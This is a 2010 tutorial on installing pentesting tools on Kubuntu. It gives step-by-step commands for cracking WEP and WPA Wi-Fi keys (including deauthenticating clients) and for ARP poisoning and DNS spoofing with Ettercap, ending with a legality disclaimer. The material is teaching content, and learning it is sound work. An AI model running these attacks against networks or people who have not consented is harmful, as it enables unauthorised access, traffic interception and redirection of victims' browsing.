Download - Basic Penetrartion Testing-Kubuntu Style
Basic Penetration Testing: Kubuntu Style Linux for the casual hacker Installing: Aircrack-ng
Ettercap
Kismet
MacChanger
Metasploit Framework
Nmap
Social Engineering Toolkit (SET)
Wireshark
Basic Use: Kismet network sniffing
Aircrack-ng WEP and WPA cracking
Ettercap ARP poisoning / DNS Spoofing
2010
Chris Griffith [email protected]
Version 1.1 February 25, 2010
PENETRATION TESTING Step 1: Install Kubuntu .................................................................................................................................. 4
Step 2: Update apt-get .................................................................................................................................. 4
Update repository list ............................................................................................................................... 4
Upgrade current programs ....................................................................................................................... 4
Step 3: Install Basic Packages ........................................................................................................................ 4
Install Aircrack-ng.......................................................................................................................................... 5
Install Dependencies ................................................................................................................................. 5
Download Aircrack-ng ............................................................................................................................... 5
Download and Extract Dictionary ............................................................................................................. 5
Extract Aircrack-ng source files ................................................................................................................. 5
Install Aircrack-ng...................................................................................................................................... 5
Update Airodump-ng ................................................................................................................................ 5
Remove Install File .................................................................................................................................... 5
Install MacChanger ....................................................................................................................................... 6
Install Dependencies ................................................................................................................................. 6
Install MacChanger ................................................................................................................................... 6
Install Wireshark ........................................................................................................................................... 6
Install Kismet ................................................................................................................................................. 7
Install Dependencies ................................................................................................................................. 7
Download Kismet ...................................................................................................................................... 7
Extract Kismet source files ........................................................................................................................ 7
Run Configuration ..................................................................................................................................... 7
Install Kismet ............................................................................................................................................. 7
Remove Install File .................................................................................................................................... 8
Configure Kismet ....................................................................................................................................... 8
Install Metasploit .......................................................................................................................................... 9
Download Metasploit ............................................................................................................................... 9
Enable Execution ....................................................................................................................................... 9
Install Metasploit ...................................................................................................................................... 9
Remove Install File .................................................................................................................................... 9
Install SET .................................................................................................................................................... 10
Install Dependencies ............................................................................................................................... 10
Download SET ......................................................................................................................................... 10
Run SET ................................................................................................................................................... 10
Install Nmap ................................................................................................................................................ 11
Download Nmap ..................................................................................................................................... 11
Extract Nmap Files .................................................................................................................................. 11
Configure Nmap ...................................................................................................................................... 11
Install Nmap ............................................................................................................................................ 11
Install Nmap GUI, Zenmap ...................................................................................................................... 11
Remove Install Files ................................................................................................................................ 12
Install Ettercap ............................................................................................................................................ 12
Install Dependencies ............................................................................................................................... 12
Install Ettercap ........................................................................................................................................ 12
Install Ettercap's gtk GUI ......................................................................................................................... 12
Running Kismet ........................................................................................................................................... 13
Running Aircrack-ng .................................................................................................................................... 18
Scanning Networks ................................................................................................................................. 18
WEP Attack .............................................................................................................................................. 19
WPA Attack ............................................................................................................................................. 21
DNS spoofing with Ettercap ........................................................................................................................ 25
Editing Where to Redirect Targets .......................................................................................................... 25
Sniffing Network Traffic .......................................................................................................................... 25
Poisoning Targets .................................................................................................................................... 27
Contact Info................................................................................................................................................. 29
Legal Notice and Disclaimer ........................................................................................................................ 29
Liability .................................................................................................................................................... 29
Legality .................................................................................................................................................... 29
STEP 1: INSTALL KUBUNTU
(Most of these commands are also friendly with other flavors of Ubuntu)
• Go to http://www.kubuntu.org/ • Download (free) or Order a CD/DVD of Kubuntu • Install Kubuntu – if you need help there are plenty of community support sites online similar to
linux.com that will help you get started
STEP 2: UPDATE APT-GET
Note: requires internet connection
apt-get is the program that you will be using to download multiple components. The first step is to update its repository list and also see if there are any program updates needed. To run these commands start the terminal. It can be found under Applications >> System >> Terminal.
UPDATE REPOSITORY LIST
UPGRADE CURRENT PROGRAMS
STEP 3: INSTALL BASIC PACKAGES
These will make your life easier while installing packages and using kubuntu.
Note: While installing, it is assumed that you are starting in your home directory. You can make sure you are in that directory before doing any installations by typing in:
NOTICE: Each block of code represents a single command, even if on multiple rows!
sudo apt-get -y update
sudo apt-get -y upgrade
sudo apt-get -y install build-essential subversion libglut3-dev python-dev iw
libssl-dev
sudo cd ~
INSTALL AIRCRACK-NG
Website: http://aircrack-ng.org/
Description: "Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools."
INSTALL DEPENDENCIES
DOWNLOAD AIRCRACK-NG
DOWNLOAD AND EXTRACT DICTIONARY
EXTRACT AIRCRACK-NG SOURCE FILES
INSTALL AIRCRACK-NG
UPDATE AIRODUMP-NG
REMOVE INSTALL FILE
sudo apt-get -y install build-essential libssl-dev libsqlite3-0 iw rar unrar
wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz
wget http://www.christophergriffith.net/downloads/Glist.rar
unrar e Glist.rar
tar -zxvf aircrack-ng-1.0.tar.gz
cd aircrack-ng-1.0
make
sudo make install
sudo airodump-ng-oui-update
cd ~
INSTALL MACCHANGER Website: http://www.alobbs.com/macchanger
Description: “A GNU/Linux utility for viewing/manipulating the MAC address of network interfaces”
INSTALL DEPENDENCIES
INSTALL MACCHANGER
INSTALL WIRESHARK Website: http://www.wireshark.org
Description: "Wireshark is the world's foremost network protocol analyzer, and is the de facto (and often de jure) standard across many industries and educational institutions."
sudo rm aircrack-ng-1.0.tar.gz
sudo rm –r aircrack-ng-1.0
sudo apt-get -y install macchanger iproute-dev zenity
sudo apt-get -y install macchanger-gtk
sudo apt-get -y install wireshark
INSTALL KISMET Website: http://www.kismetwireless.net/
Description: "Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.
Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, de-cloaking) hidden networks, and inferring the presence of nonbeaconing networks via data traffic. "
INSTALL DEPENDENCIES
DOWNLOAD KISMET
EXTRACT KISMET SOURCE FILES
RUN CONFIGURATION
Note: (LOOK AT THE OUTPUT! It may say "LibNL/nl80211 support was not found." check to make sure it's installed. The terminal may just say this because it's just not needed/used. If there are errors here try to fix them and then you will need to run this command again before "make dep")
INSTALL KISMET
sudo apt-get -y install libruby libcurses-ruby libncurses5-dev libncurses5
sudo apt-get -y install libpcap-dev libnl-dev libnl1
wget http://www.kismetwireless.net/code/kismet-2010-01-R1.tar.gz
tar -zxvf kismet-2010-01-R1.tar.gz
cd kismet-2010-01-R1
./configure
make dep
sudo make install
Note: It will give the option to use "sudo make suidinstall" which means you do not have to run kismet as root, however in kubuntu that is very temperamental and requires the kismet_server to be started as root separately anyways. I would recommend just using "sudo make install" and running it as root.
REMOVE INSTALL FILE
CONFIGURE KISMET
You will also have to edit the configuration file before using kismet. This will be covered in the section below about kismet usage. You can edit the file by typing
cd ~
sudo rm kismet-2010-01-R1.tar.gz
sudo rm –r kismet-2010-01-R1
sudo kate /usr/local/etc/kismet.conf
INSTALL METASPLOIT Metasploit is arguably the best open database of exploits.
Website: http://www.metasploit.com/
Description: "Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals."
DOWNLOAD METASPLOIT
ENABLE EXECUTION
INSTALL METASPLOIT
REMOVE INSTALL FILE
In case you hate cluttering up your home folder like I do, remove the install files with:
wget http://www.metasploit.com/releases/framework-3.3.3-linux-i686.run
chmod +x framework-3.3.3-linux-i686.run
sudo ./framework-3.3.3-linux-i686.run
sudo rm framework-3.3.3-linux-i686.run
INSTALL SET The Social Engineering Toolkit, a very nice and easy way to run a multitude of different exploits, by exploiting the user with payloads from Metasploit.
Website: http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit
Description: "The Social-Engineering Toolkit (SET) was designed by David Kennedy (ReL1K) and incorporates many useful Social-Engineering attacks all in one simplistic interface. The main purpose of SET is to automate and improve on many of the social-engineering attacks out there. As pentesters, social-engineering is often a practice that not many people perform."
INSTALL DEPENDENCIES
NOTE: SET requires Metasploit, please install it before trying to run SET
DOWNLOAD SET
RUN SET
SET does NOT require installation. To run SET, go it it's directory and type in " sudo ./set " In this scenario, the code would look like:
sudo apt-get -y install subversion libglut3-dev python-dev iw ruby-full
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
cd SET
sudo ./set
INSTALL NMAP Website: http://nmap.org/
Description”: Nmap (‘Network Mapper’) is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts.”
Note: If you simply want to install Nmap and Zenmap and not worry if they are the latest version just type:
If you DO want the newest version, follow these steps:
DOWNLOAD NMAP
EXTRACT NMAP FILES
CONFIGURE NMAP
INSTALL NMAP
INSTALL NMAP GUI, ZENMAP
sudo apt-get -y install nmap
sudo apt-get -y install zenmap
wget http://nmap.org/dist/nmap-5.21.tar.bz2
bzip2 -cd nmap-5.21.tar.bz2 | tar xvf -
cd nmap-5.21
./configure
make
sudo make install
sudo apt-get -y install zenmap
REMOVE INSTALL FILES
INSTALL ETTERCAP Website: http://ettercap.sourceforge.net/
Description: “Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis.”
Note: Ettercap is fairly well supported by the Ubuntu team and you can usually find an up to date version in the repositories. This just outlines which dependencies to get along with the GUI.
INSTALL DEPENDENCIES
INSTALL ETTERCAP
INSTALL ETTERCAP'S GTK GUI
cd ~
sudo rm nmap-5.21.tar.bz2
sudo rmdir nmap-5.21
sudo apt-get -y install libnet6-1.3-dev libpcap-dev libpthread-stubs0-dev zlib-bin
zlibc libtool libpcre3-dev libpcre-ocaml-dev openssl libssl0.9.8 libncurses5-dev
libncurses5 ettercap-common libnet1
sudo apt-get -y install ettercap
sudo apt-get -f -y install ettercap-gtk
RUNNING KISMET Kismet is a user friendly program overall but needs some configuration before staring. Before starting kismet, you need to edit the configuration file.
Note: If you are running Ubuntu, type gedit instead of kate
Once having kismet.conf open, find the line
# logprefix=/some/path/to/logs
This is where you will have to change where all kismet's log files are stored. I personal use
/home/<myusername>/wifi/logs
(Change to your user name for your home folder.) To add these directories to your home folder, before editing the line, open a terminal and type:
The next thing you need to specify is which adapter of yours to use for wireless sniffing. Find the lines
# ncsource=interface:options
# for example:
# ncsource=wlan0
# ncsource=wifi0:type=madwifi
# ncsource=wlan0:name=intel,hop=false,channel=11
After all these add a line with your adapter. Most people would add
ncsource=wlan0
NOTE: If you are unsure what type of adapter you have, go to a terminal and type
This will display what network devices it finds. Then chose a wireless card, generally noted by wlan or wifi
sudo kate /usr/local/etc/kismet.conf
sudo mkdir ~/wifi
sudo mkdir ~/wifi/logs
ifconfig
The last thing you will want to change is where it says:
# Do we have a GPS?
gps=true
If you don't have a gps unit hooked up to your computer change it to
gps=false
You can now run kismet by opening a terminal and typing
One opening, if configured correctly it should ask you if you want to start kismet server. Select yes
sudo kismet
It will then give you options about the kismet server. You don't have to change anything here, click start
The terminal now will show what is running in the server, this isn't overly exciting, it will simply tell you if anything is going wrong. Close that window to get back to kismet by going to the bottom right hand corner.
You now should see the main page of Kismet. From here you can see all the wireless networks it has picked up, the general packet rate and how much data is being transferred. You can also select an individual network to find out more about it. However, before being able to select a network you have to sort them. I generally like to
sort by which network has the most packet traffic. You can do this by going to the top menu, Sort >> Packets (descending) or by hitting Alt+S then Shift + P
You can now select a network which will display general information about it. Click it or hit enter to see more details about it. To get back to the regular view, go to Network >> Close Window or Alt + N then hit W.
Another handy view is to go to Windows >> Channel View or Alt + W then C. It will show which channels has the most traffic, packet rate, and general signal strength.
That is the basic usage of Kismet, if you are interested in knowing more you can find a lot more usage and details all over forums and community sites.
RUNNING AIRCRACK-NG
Aircrack is the premier network cracking program. There are a few steps that will make it much easier to crack a network. I will outline the basics of scanning for a network to attack and how to attack it if it is either WEP or WPA.
SCANNING NETWORKS
First you want to put your wireless card in monitor mode. Do this by typing
For me this looks like:
sudo airmon-ng start <wireless interface>
sudo airmon-ng start wlan1
We then start scanning the different networks with the interface in monitoring mode.
The first type of attack we are going to run against a network running WEP encryption.
WEP ATTACK Once you find a suitable target, you need to start capturing IVs. Do this by specifying the network channel and that you only want to log IVs.
For my network, my command looks like:
sudo airodump-ng --channel 8 -w wifi/caps/WEP --ivs mon0
sudo airodump-ng mon0
sudo airodump-ng --channel <channel number> -w <cap file> --ivs mon0
Once you have collected a LOT of IVs (which you can see under the "#Data" column, a few thousand at least), start up aircrack on the file you have created. Notice that it now will be a .ivs file. It also is appended with numbers, so the first time you run that file, it would be WEP-01.ivs.
The command would look like:
My command is:
sudo aircrack-ng -a 1 <cap file>
sudo aircrack-ng -a 1 wifi/caps/WEP-01.ivs
Select the network you want to attack.
If you find the key, you can now use it to connect to the network. If not, it will probably ask you to capture more IVs and try again.
WPA ATTACK
WPA attacks require a device that supports packet injection; this will allow you to de-authenticate clients so they have to reconnect, which will allow you to capture their handshake. You will also need a dictionary of words to try and dictionary attack. You can download them online multiple places, I complied a small collection of very large dictionaries that you can download using:
When you see a network that you are interested in, you want to refine your network search and start logging the output.
The network I am going after is called Rogue Network which is on channel 1, so my command looks like
sudo airodump-ng --channel <channel number> -w <cap file> mon0
sudo airodump-ng --channel 1 -w wifi/caps/WPA mon0
While scanning the networks, you will notice underneath difference devices that are connect to the networks. This attack is much more powerful if you have someone in particular to de-authenticate.
Note: Make sure you are still running airodump-ng in another terminal. You will need to capture the WPA handshake as soon as the clients try to re-authenticate.
You can try to de-authenticate everyone and see if everyone reconnects:
Or you can specify a particular client to attack, by adding one after -c
sudo aireplay-ng --deauth <number of deauths to send> -a <target bssid> -c <clients
bssid> mon0
My example looks like:
sudo aireplay-ng --deauth <number of deauths to send> -a <target bssid> mon0
sudo aireplay-ng --deauth 5 -a 00:14:D1:C3:C9:88 -c 00:16:EA:72:58:BA mon0
Now switch over to the airodump-ng tab, and in the upper right hand corner, see if it says WPA Handshake
If you were able to capture one, you can move over to dictionary attacking it. If you were unable to capture a handshake, make sure you are attacking a WPA network with aireplay-ng and that there are clients connected to it.
The next step requires a dictionary file to try and crack it using a list of common words and passwords.
My command will look like this
sudo aircrack-ng -a 2 -w <dictionary file> <caps file>
It will start testing against your word list, and hopefully find the key.
sudo aircrack-ng -a 2 -w Glist.txt wifi/caps/WPA-01.cap
DNS SPOOFING WITH ETTERCAP
EDITING WHERE TO REDIRECT TARGETS
First step it to decide where to redirect the target, you can edit the file etter.dns.
At the end of the file, you can type the domain you want to redirect, and the IP of where you want to redirect to. to simply redirect someone, type the URL then A then the IP to redirect to.
For example, to redirect traffic from Google to Bing, type
google.com A 64.4.8.147
*.google.com A 64.4.8.147
The second one includes a wildcard so any subdomain of google will also be redirected or if they type www before it. You can find the IP address of the site you want to redirect to by going to the terminal and typing:
This will display a list of ips tied to that domain, the main one will be the first line displayed.
Save and close the file, now start up ettercap as root.
Note: if you are having problems with ettercap in GTK mode try running it directly in the terminal with curses. Do this by typing "sudo ettercap -C".
Now that you have your shinny front end, you want to first start sniffing the traffic of the network you are connected to. Remember, ettercap only works when you are connected to a network, while aircrack and kisment work better without being connected to a network.
SNIFFING NETWORK TRAFFIC
The next step you want to do is to start sniffing the traffic and all the hosts on your network. Start the "Unified sniffing.." under the "Sniff" menu item (Sniff >> Unified sniffing...), or ht Shift + U
sudo kate /usr/share/ettercap/etter.dns
host <website url>
sudo ettercap -G
.
This will bring up a drop down box of interfaces to sniff on. Select the one which you are connected to the network on. After selecting this and hitting ok, you will notice a larger selection of menu items.
Running in curses: you will need to type the name of the adapter in instead.
You now want to scan all the hosts on your network, to select your targets. Do this by going to Hosts >> Scan for hosts or Ctrl + S. Once the scan is complete, press H to see the hosts it picked up, or go to Hosts >> Hosts list.
Now you need to select who you want to poison. You are currently being the "man in the middle" and are choosing which connections to be between. To successfully spoof the DNS of the target computers, you must know the device that they are connected too. You can usually tell by it being a far off IP from the other's on the list. Most home routers will be 192.168.0.1 - 192.168.1.10 range. The one you see in the examples is 192.168.1.1. Select it and click on "Add to Target 1" the select all the other devices, or a specific one you want to poison, and add it to target 2.
.
Running in curses: you will have to manually add the targets. you can do this by hitting Ctrl + T or going to Targets >> Select TARGET(s). Then enter in the ips of the targets between the slashes. so either /192.168.1.1/ would work or /192.168.1.1-255/ if you want to do a range.
Note: You can check to make sure you specified the right targets by hitting T or going to Targets >> Current Targets.
POISONING TARGETS Now you need to poison the targets ARP. Go to Mitm >> Arp poisoning... A popup will appear, and you don't need to have any optional parameters, just accept and go on. Now hit Ctrl + W to start sniffing, or go to Start >> Start sniffing...
Finally enable the DNS Spoofing pluging by hitting Ctrl + P (Plugins >> Manage the plugins) and select "dns_spoof".
Now in the console underneath you should see the command "Activating dns_spoof plugin..."
Then lean back and laugh as you see your plugin working, it will display content when people try to go to a spoofed site: "dns_spoof: [<original url>] spoofed to [<new ip>]"
CONTACT INFO
I hope you have found this information useful and accurate.
If you find anything incorrect or confusing, or simply want to send a message, please feel free to contact me.
LEGAL NOTICE AND DISCLAIMER
LIABILITY 1. You are the only one liable if you use this information in an illegal or unethical manner. I hold no
responsibility for your actions with this knowledge. I hope you find it useful to test on your own network and learn how to tighten your own security.
LEGALITY 2. It is ILLEGAL to use many of these programs on networks you don’t own. Make sure you are abiding all
laws while using these programs.